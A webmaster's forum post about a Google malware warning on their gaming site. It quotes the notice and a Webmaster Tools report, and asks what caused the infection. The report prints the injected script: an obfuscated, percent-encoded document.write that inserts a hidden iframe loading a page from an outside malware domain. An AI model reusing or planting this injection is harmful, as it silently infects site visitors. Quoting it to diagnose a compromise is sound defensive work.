got this message today from google:
Code:Dear site owner or webmaster of nowgamez.com , We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com. Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs): http://nowgamez .com/ http://www.nowgamez .com/ Here is a link to a sample warning page: http://www.google.com/interstitial?url=http%3A//nowgamez.com/ We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because: 1) the site was compromised 2) the site doesn't monitor for malicious user-contributed content 3) the site displays content from an ad network that has a malicious advertiser If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites: http://www.stopbadware.org/home/security Once you've secured your site, you can request that the warning be removed by visiting http://www.google.com/support/webmasters/bin/answer.py?answer=45432 and requesting a review. If your site is no longer harmful to users, we will remove the warning. Sincerely, Google Search Quality Team Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
In the webmasters it showed this:
Code:Malware « Go back URL: http://www.nowgamez.com/ Last checked: September 12, 2010 Suspected injected code Instances <script>document.write(unescape('%3C%73%70%61%6E%20%73%74%79 %6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F %77%77%77%2E%67%75%6F%75%6F%2E%63%6F%6D%2F%69%6D%67%2F%2E%6E %65%65%64%65%64%2F%65%6E%74%2E%70%68%70%22%3E%3C%2F%69%66%72 %61%6D%65%3E%3C%2F%73%70%61%6E%3E'));</script>
if I check this link:
http://www.google.com/safebrowsing/d...w.nowgamez.com
The google fetch bot, says success (in webmaster tools).Code:it says: What happened when Google visited this site? Of the 5 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-12, and the last time suspicious content was found on this site was on 2010-09-12. Malicious software is hosted on 1 domain(s), including guouo.com/ . This site was hosted on 1 network(s) including AS21844 (THEPLANET).
Any ideas what caused it or what to check? I've already checked all files for this code, but nothing found....
damn....![]()




Reply With Quote





